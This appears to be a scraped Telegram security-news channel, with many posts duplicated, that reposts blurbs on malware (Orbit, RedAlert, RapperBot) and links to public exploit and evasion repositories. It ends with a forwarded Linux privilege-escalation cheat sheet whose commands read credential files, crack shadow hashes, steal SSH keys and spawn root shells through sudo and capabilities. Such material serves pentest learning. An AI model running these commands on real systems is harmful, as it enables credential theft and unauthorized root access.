Windows Kerberos KerbRetrieveEncodedTicketMessage AppContainer Privilege Escalation
On Windows 11, the Kerberos SSP's KerbRetrieveEncodedTicketMessage message can be used to get an arbitrary service ticket and session key from an AppContainer even without the enterprise authentication capability leading to elevation of privilege.
▶️ Источник
Дневник Безопасника 🛡
On Windows 11, the Kerberos SSP's KerbRetrieveEncodedTicketMessage message can be used to get an arbitrary service ticket and session key from an AppContainer even without the enterprise authentication capability leading to elevation of privilege.
▶️ Источник
Дневник Безопасника 🛡
Packetstormsecurity
Windows Kerberos KerbRetrieveEncodedTicketMessage AppContainer Privilege Escalation ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
👍1
Sneaky Orbit Malware Backdoors Linux Devices
The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.
▶️ Источник
Дневник Безопасника 🛡
The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.
▶️ Источник
Дневник Безопасника 🛡
Threat Post
Sneaky Orbit Malware Backdoors Linux Devices
The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.
👍1
Hackers Exploiting Follina Bug to Deploy Rozena Backdoor
A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.
▶️ Источник
Дневник Безопасника 🛡
A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.
▶️ Источник
Дневник Безопасника 🛡
👍1
RCE Vulnerability In UnRAR Library Affected Zimbra Platform
A severe remote code execution vulnerability affected the Zimbra email client. The bug typically existed in the UnRAR library that could trigger RCE on the Zimbra platform. Thankfully, the bug received a fix before malicious exploitation.
▶️ Источник
Дневник Безопасника 🛡
A severe remote code execution vulnerability affected the Zimbra email client. The bug typically existed in the UnRAR library that could trigger RCE on the Zimbra platform. Thankfully, the bug received a fix before malicious exploitation.
▶️ Источник
Дневник Безопасника 🛡
LHN
RCE Vulnerability In UnRAR Library Affected Zimbra Platform
A severe remote code execution vulnerability affected the Zimbra email client. The bug typically existed in the UnRAR library that could trigger RCE on the Zimbra platform. Thankfully, the bug received a fix before malicious
👍1
Pamspy - Credentials Dumper For Linux Using eBPF
pamspy leverage eBPF technologies to achieve an equivalent work of 3snake.
▶️ Источник
Дневник Безопасника 🛡
pamspy leverage eBPF technologies to achieve an equivalent work of 3snake.
▶️ Источник
Дневник Безопасника 🛡
KitPloit - PenTest & Hacking Tools
Pamspy - Credentials Dumper For Linux Using eBPF
👍1
RedAlert: A Ransomware that Targets Multiple OS Platforms
RedAlert (aka N13V), a new ransomware threat, has been found, that encrypts both Windows and Linux VMWare ESXi servers.
▶️ Источник
Дневник Безопасника 🛡
RedAlert (aka N13V), a new ransomware threat, has been found, that encrypts both Windows and Linux VMWare ESXi servers.
▶️ Источник
Дневник Безопасника 🛡
Cyware Labs
RedAlert: A Ransomware that Targets Multiple OS Platforms | Cyware Hacker News
New ransomware, dubbed RedAlert or N13V, encrypts both Linux and Windows VMware ESXi servers on corporate networks. Click here to learn more!
👍1
DeathSleep
A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://github.com/janoglezcampos/DeathSleep
Дневник Безопасника 🛡
A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://github.com/janoglezcampos/DeathSleep
Дневник Безопасника 🛡
GitHub
GitHub - janoglezcampos/DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it…
A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution. - janoglezcam...
👍1
phpMyAdmin Exploit CVE-2022-23808
phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)
https://github.com/dipakpanchal456/CVE-2022-23808
Дневник Безопасника 🛡
phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)
https://github.com/dipakpanchal456/CVE-2022-23808
Дневник Безопасника 🛡
GitHub
GitHub - dipakpanchal05/CVE-2022-23808: phpMyAdmin XSS
phpMyAdmin XSS . Contribute to dipakpanchal05/CVE-2022-23808 development by creating an account on GitHub.
👍1
CVE-2022-35416
H3C SSL VPN XSS(Reflected XSS) CVE-2022-35416
https://github.com/safe3s/CVE-2022-35416
Дневник Безопасника 🛡
H3C SSL VPN XSS(Reflected XSS) CVE-2022-35416
https://github.com/safe3s/CVE-2022-35416
Дневник Безопасника 🛡
GitHub
GitHub - safe3s/CVE-2022-35416: H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416
H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416. Contribute to safe3s/CVE-2022-35416 development by creating an account on GitHub.
👍1
cve-2022-29455 elementor wordpress plugin xss exploit
While searching for known bugs in Elementor we saw an interesting bug (CVE-2021-24891) that was raised in the past which uses a DOM-XSS to attack a user logged in to the system. Because we already have some knowledge in Javascript and had fun with DOM-XSS together in the past, we decided to deep dive into this CVE.
https://github.com/alirezasalehizadeh/cve-2022-29455
Дневник Безопасника 🛡
While searching for known bugs in Elementor we saw an interesting bug (CVE-2021-24891) that was raised in the past which uses a DOM-XSS to attack a user logged in to the system. Because we already have some knowledge in Javascript and had fun with DOM-XSS together in the past, we decided to deep dive into this CVE.
https://github.com/alirezasalehizadeh/cve-2022-29455
Дневник Безопасника 🛡
👍1
Gitlab Project Import RCE Analysis (CVE-2022-2185)
https://github.com/ESUAdmin/CVE-2022-2185
▶️ Источник
Дневник Безопасника 🛡
https://github.com/ESUAdmin/CVE-2022-2185
▶️ Источник
Дневник Безопасника 🛡
GitHub
GitHub - ESUAdmin/CVE-2022-2185: wo ee cve-2022-2185 gitlab authenticated rce
wo ee cve-2022-2185 gitlab authenticated rce. Contribute to ESUAdmin/CVE-2022-2185 development by creating an account on GitHub.
👍1
PackMyPayload - Emerging Threat of Containerized Malware
This tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.
https://github.com/mgeeky/PackMyPayload
Дневник Безопасника 🛡
This tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.
https://github.com/mgeeky/PackMyPayload
Дневник Безопасника 🛡
GitHub
GitHub - mgeeky/PackMyPayload: A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate…
A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats. Supports: ZIP, 7zip, PDF, ISO, IMG, CAB, VHD, V...
👍1
gofetch
This could have been a bash one-liner but guess what. It's a small Go tool that lists the trending CVEs from cvetrends.com
https://github.com/tr3ss/gofetch
Дневник Безопасника 🛡
This could have been a bash one-liner but guess what. It's a small Go tool that lists the trending CVEs from cvetrends.com
https://github.com/tr3ss/gofetch
Дневник Безопасника 🛡
GitHub
GitHub - tr3ss/gofetch: This could have been a bash one-liner but guess what. It's a small Go tool that lists the trending CVEs…
This could have been a bash one-liner but guess what. It's a small Go tool that lists the trending CVEs from cvetrends.com - tr3ss/gofetch
Forwarded from Monkey Hacker
#linux
Linux Privilege Escalation Cheat Sheet 🗞
🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Linux Privilege Escalation Cheat Sheet 🗞
🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍1
Новый ботнет-рэпер для Linux брутфорсит SSH-серверы
Обнаруженный на днях ботнет “RapperBot” с середины июня 2022 года проводит брутфорс-атаки на SSH-серверы Linux. За основу авторы вредоноса взяли троян Mirai, изменив ряд его особенностей (например, бесконтрольное распространение на максимально доступное число устройств).
Обнаруженный на днях ботнет “RapperBot” с середины июня 2022 года проводит брутфорс-атаки на SSH-серверы Linux. За основу авторы вредоноса взяли троян Mirai, изменив ряд его особенностей (например, бесконтрольное распространение на максимально доступное число устройств).
👍1